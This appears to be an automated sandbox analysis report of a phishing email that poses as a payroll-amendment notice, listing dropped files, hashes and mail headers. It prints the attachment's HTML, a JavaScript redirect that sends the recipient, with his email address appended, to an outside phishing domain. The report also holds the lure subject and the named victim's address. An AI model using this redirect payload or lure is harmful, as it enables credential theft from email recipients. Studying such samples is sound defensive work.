Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-08-27T16:07:18">.. Build: 16.0.18014.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):0
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3684E397C181DFF483A36021B05E4D67
                                          SHA1:04AEDC0F5561A76C15B2371F07174E0A765FB4B6
                                          SHA-256:4D7C06EB7EBDA4F27ECEB8BFC78EC57BE1C81227790DFC43185B241A270AA726
                                          SHA-512:144B18CF024B964F16046A4A90AD58E0D5C22870AF23F782857909F60A360A8ED7E9ED96C3C2FA835E8B4F50F3D229B59B60EFABDE29E51E62C8CC8B99CEC41F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<html>..<head>..<title>Detail notification for Murexltd</title>..</head>..<body>..<SCRIPT LANGUAGE="JavaScript">.. ..self.location = 'https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.com';..//-->..</SCRIPT>..</body>..</html>
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):247
                                          Entropy (8bit):5.34185836252491
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3684E397C181DFF483A36021B05E4D67
                                          SHA1:04AEDC0F5561A76C15B2371F07174E0A765FB4B6
                                          SHA-256:4D7C06EB7EBDA4F27ECEB8BFC78EC57BE1C81227790DFC43185B241A270AA726
                                          SHA-512:144B18CF024B964F16046A4A90AD58E0D5C22870AF23F782857909F60A360A8ED7E9ED96C3C2FA835E8B4F50F3D229B59B60EFABDE29E51E62C8CC8B99CEC41F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<html>..<head>..<title>Detail notification for Murexltd</title>..</head>..<body>..<SCRIPT LANGUAGE="JavaScript">.. ..self.location = 'https://designgallerias.com/Oiaduon30aDN0wXONyIN/#gjohnson@murexltd.com';..//-->..</SCRIPT>..</body>..</html>
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:[ZoneTransfer]..ZoneId=3..
                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                          File Type:data
                                          Category:modified
                                          Size (bytes):30
                                          Entropy (8bit):1.2389205950315936
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FC42BE62D9F6AAEAA33E407DB245E5AE
                                          SHA1:3C81C3FD0F893B92245B50C62C478F84CE001C57
                                          SHA-256:9C100CD3AE7FB7FB13DABA8EB679295E089F4987E4922D919BEEABDF0BEF119D
                                          SHA-512:8663DFC4CCD9CF7842AB6D5124EF80884FF55252B6F8125FCA47C8162B2BD6B47093F190A4BDE88C8B615E442A9E5C4888EB9A979130818C686E80882A38D164
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..............................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):4.003196370517185
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6323C47807EC28832BFA24CFFDFB7DB0
                                          SHA1:F8C973C3EC36F3713DA1DF33752F20BDE6355735
                                          SHA-256:52FF55E35410996723F72375B8F5845B73E8CB3F7619C2323BFD8EAF13E60606
                                          SHA-512:AE39565EB19EE3D05EE584C718A49005DAF91139991B633548ADE367FC8E68C671C844ACE2E9B9E823015797E207A559FBED8A176B1F612ED908E3FB3007F6BD
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....L..5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):4.017946966064173
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:70763A2A81464D0770CDF0E0F3F4BA71
                                          SHA1:6A0B44A86CA99D0329102F53F131E8E554DC5296
                                          SHA-256:9F80389376C7F4046BD0572C79FE566ABC317D5F789562BC2B69EB29135940D1
                                          SHA-512:948A8952DB5011068E8C9360891F3ED23CF7E35C01282929ACBA814C061356AB5D111867B117E061F40213BECD22B735B255AAA84CD1765C7DAF0D3145A55CAB
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....h.5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2693
                                          Entropy (8bit):4.026471553591726
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7DEFE200EAB439B674B5B5AE12210715
                                          SHA1:56F1F907A5A47D7C379C6CE7BBDDF3A92A11A094
                                          SHA-256:1CFF7DECD9E0305B6910BDAD67114743C6479D1A5806EE351C4626B532AFCBD0
                                          SHA-512:A6A9639DE214B92C57FA8A5A06A2F5746FD9330B71F193EFFE02403585C46CFFB6BF429323EC7DA5223FBF0B035DB58D2DDC70A967BF0CC3018041E205EEC98F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2681
                                          Entropy (8bit):4.015723546961491
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D2151C24E4869431F82A35833B426E90
                                          SHA1:16104437BC8E761D83A2CBFAD1E08CBD1420DFB0
                                          SHA-256:D1F8D655E2E7ECDC1EFC575CCB110B6DD54F0FD7E1C9A16CAA28DD4B34F8BA9D
                                          SHA-512:958E58BD2B3F0FF6D847E7A522F9AEDCCED4925C5F39A780556F4A4DBB533101956AA3D89123FB6E2DBFB067CA6EBEC0773FE9858E73A8D6441BE12ABE8B0173
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.....t.5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2681
                                          Entropy (8bit):4.007317530767082
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:64DB27776C7EDE93B074606470295705
                                          SHA1:C4F30FBB0B3E79363DFD12E061F3ED7AFC80530B
                                          SHA-256:3ABCB162501EC236AB60187874D0CAE6E3A4A40B555ADD58876A8875A7A1C477
                                          SHA-512:A65A635A52E81C23ECD11EF75714D7838F3D7DD985253345375E5FD6AE00BA1362876B77058A6617AC4A9973E395443D0396B222466B88FE47E5822E7D82E9B3
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,.......5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 15:07:26 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2683
                                          Entropy (8bit):4.01539267367978
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9E56AEDED5AF90D5C869FF122191BEE0
                                          SHA1:3E4751F5A7337DDCEEFCD406EB86505BCF40EBE0
                                          SHA-256:877BF55C9C590F144C027ECC109366D56866CEBFEE63F739376DCEA6B1F210E7
                                          SHA-512:09B5EEC2D0809F82860A31ECF6F3604F67A25FBD2A575BE8F99E926C144EFE9C2D0CEF522DD425EC7483BC0BE84EE7E6CF956F39624BFA22B60F54FD429C6712
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,......y5........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          File type:CDFV2 Microsoft Outlook Message
                                          Entropy (8bit):3.5931491952152883
                                          TrID:
                                          • Outlook Message (71009/1) 58.92%
                                          • Outlook Form Template (41509/1) 34.44%
                                          • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                          File name:ocedures.msg
                                          File size:56'832 bytes
                                          MD5:9f3e44d62892eabb1442327ada8f0332
                                          SHA1:e365751b6e99a7c7629b752d5d1755bc805fbca1
                                          SHA256:1637dd7df01a9c28f85ff195cb4744150850b6935b2bfee9e248dae0b5f1accb
                                          SHA512:f9688e8f184f6aa76153b8fc376746946483df5a3a64bc8eae6b02be091533e5c27e8c28f72e4e1ab0efb29ebabf7cfbc567cf60cd8323f779f5ff041fa69b58
                                          SSDEEP:768:BzbjutXo6nzDqrB9dbQ4e2asm2tDNBLgyPPXo6nzDqrI3yT7V+1Mf5j5:9CtXoozDMMDneXoozDFyTQ1
                                          TLSH:4C438D2436FA4215F2B7EF3649F5909795377C92AD21CE4E2191330E0A72A41E9B1F3B
                                          File Content Preview:........................>......................................................................................................................................................................................................................................
                                          Subject:Please Read: Murexltd Employees New Payroll Amendment, Paid Medical Leave And Emergency Loan Procedures
                                          From:Murexltd Notification <support@mainet.ne.jp>
                                          To:Gordon Johnson <GJohnson@murexltd.com>
                                          Cc:
                                          BCC:
                                          Date:Fri, 23 Aug 2024 18:53:31 +0200
                                          Communications:
                                          • The information contained in this email and any attachments is confidential and intended solely for the use of the individual or entity to whom it is addressed. This email may contain confidential, privileged, or otherwise legally protected information. If you are not the intended recipient, you are hereby notified that any reading, dissemination, distribution, copying, or other use of this email or its attachments is strictly prohibited. If you have received this email in error, please notify the sender immediately by email and delete this email and all attachments from your system. By reading this email, you agree to the above terms and acknowledge that any breach of this confidentiality notice may result in legal action. Thank you for your cooperation.
                                          Attachments:
                                          • Employees_Payment_Amendment.htm
                                          Key Value
                                           Received:from [127.0.0.1] (unknown [4.172.205.76]) by smtp2.kagoya.net
                                           (2603:10b6:510:327::22) with Microsoft SMTP Server (version=TLS1_2,
                                           HTTPS; Fri, 23 Aug 2024 16:53:40 +0000
                                           Aug 2024 16:53:38 +0000
                                           Frontend Transport; Fri, 23 Aug 2024 16:53:37 +0000
                                           id 15.20.7897.11 via Frontend Transport; Fri, 23 Aug 2024 16:53:37 +0000
                                           mx-inbound40-106.us-east-2c.ess.aws.cudaops.com; Fri, 23 Aug 2024 16:53:32
                                           24 Aug 2024 01:53:32 +0900 (JST)
                                           Authentication-Results:spf=softfail (sender IP is 209.222.82.130)
                                           Received-Spf:pass (mx-inbound40-106.us-east-2c.ess.aws.cudaops.com: domain
                                           Content-Type:multipart/mixed;
                                           From:Murexltd Notification <support@mainet.ne.jp>
                                           To:Gordon Johnson <GJohnson@murexltd.com>
                                           Subject:=?UTF-8?B?UGxlYXNlIFJlYWQ6IE11cmV4bHRkIEVtcGxveWVlcyBOZXcgUGF5?=
                                           Message-Id:<1fcad6b1-f144-bd90-22b5-e7f8d24d80a0@mainet.ne.jp>
                                           X-Priority:1 (Highest)
                                           X-Msmail-Priority:High
                                           Importance:High
                                           Date:Fri, 23 Aug 2024 16:53:31 +0000
                                           MIME-Version:1.0
                                           X-Bess-Id:1724432012-110346-12899-3583-1
                                           X-Bess-Ver:2019.1_20240823.1304
                                           X-Bess-Apparent-Source-Ip:153.127.234.4
                                           X-Bess-Parts:H4sIAAAAAAACAz3LTQrCMBBA4bvMuosm82uvIi4mzYSCqIu2IIh3Nwvb3ePBd/
                                           X-Bess-Spam-Status:SCORE=0.50 using domain:184201 scores of
                                           X-Bess-Spam-Score:0.50
                                           Authentication-Results-Original:mx-inbound40-106.us-east-2c.ess.aws.cudaops.com; spf=pass (sender IP is
                                           X-Bess-Spam-Report:Code version 3.2, rules version 3.2.2.258545 [from
                                           -------------------------------- 0.00 HTML_MESSAGE BODY:HTML
                                           included in message 0.00 MIME_HTML_ONLY BODY:Message only has
                                           text/html MIME parts 0.50 ATTACH_EXT_DOT1 MIMEHEADER:Custom Rule
                                           ATTACH_EXT_DOT1 0.00 MISSING_MIMEOLE META:Message has
                                           X-Bess-Brts-Status:1
                                           Return-Path:support@mainet.ne.jp
                                           X-Ms-Exchange-Organization-Expirationstarttime:23 Aug 2024 16:53:37.5542
                                           X-Ms-Exchange-Organization-Expirationstarttimereason:OriginalSubmit
                                           X-Ms-Exchange-Organization-Expirationinterval:1:00:00:00.0000000
                                           X-Ms-Exchange-Organization-Expirationintervalreason:OriginalSubmit
                                           X-Ms-Exchange-Organization-Network-Message-Id:a62a00fe-034d-4c4e-4fc4-08dcc394222a
                                           X-Eopattributedmessage:0
                                           X-Eoptenantattributedmessage:d5ea0ba6-3c9e-43c2-9d1e-fffeb0d842e5:0
                                           X-Ms-Exchange-Organization-Messagedirectionality:Incoming
                                           X-Ms-Publictraffictype:Email
                                           X-Ms-Traffictypediagnostic:SN1PEPF000397B2:EE_|DM6PR16MB3733:EE_|PH7PR16MB6043:EE_
                                           X-Ms-Exchange-Organization-Authsource:SN1PEPF000397B2.namprd05.prod.outlook.com
                                           X-Ms-Exchange-Organization-Authas:Anonymous
                                           X-Ms-Office365-Filtering-Correlation-Id:a62a00fe-034d-4c4e-4fc4-08dcc394222a
                                           X-Ms-Exchange-Organization-Scl:-1
                                           X-Ipw-Groupmember:False
                                           X-Microsoft-Antispam:BCL:0;ARA:13230040|19003399015;
                                           X-Forefront-Antispam-Report:CIP:209.222.82.130;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:outbound-ip121a.ess.barracuda.com;PTR:outbound-ip121a.ess.barracuda.com;CAT:NONE;SFS:(13230040)(19003399015);DIR:INB;
                                           X-Ms-Exchange-Crosstenant-Originalarrivaltime:23 Aug 2024 16:53:37.3823
                                           X-Ms-Exchange-Crosstenant-Network-Message-Id:a62a00fe-034d-4c4e-4fc4-08dcc394222a
                                           X-Ms-Exchange-Crosstenant-Id:d5ea0ba6-3c9e-43c2-9d1e-fffeb0d842e5
                                           X-Ms-Exchange-Crosstenant-Authsource:SN1PEPF000397B2.namprd05.prod.outlook.com
                                           X-Ms-Exchange-Crosstenant-Authas:Anonymous
                                           X-Ms-Exchange-Crosstenant-Fromentityheader:Internet
                                           X-Ms-Exchange-Transport-Crosstenantheadersstamped:DM6PR16MB3733
                                           X-Ms-Exchange-Transport-Endtoendlatency:00:00:02.7423590
                                           X-Ms-Exchange-Processed-By-Bccfoldering:15.20.7897.007
                                           X-Microsoft-Antispam-Mailbox-Delivery:ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                                           Content-Transfer-Encoding:7bit
                                           date:Fri, 23 Aug 2024 18:53:31 +0200

                                          Icon Hash:c4e1928eacb280a2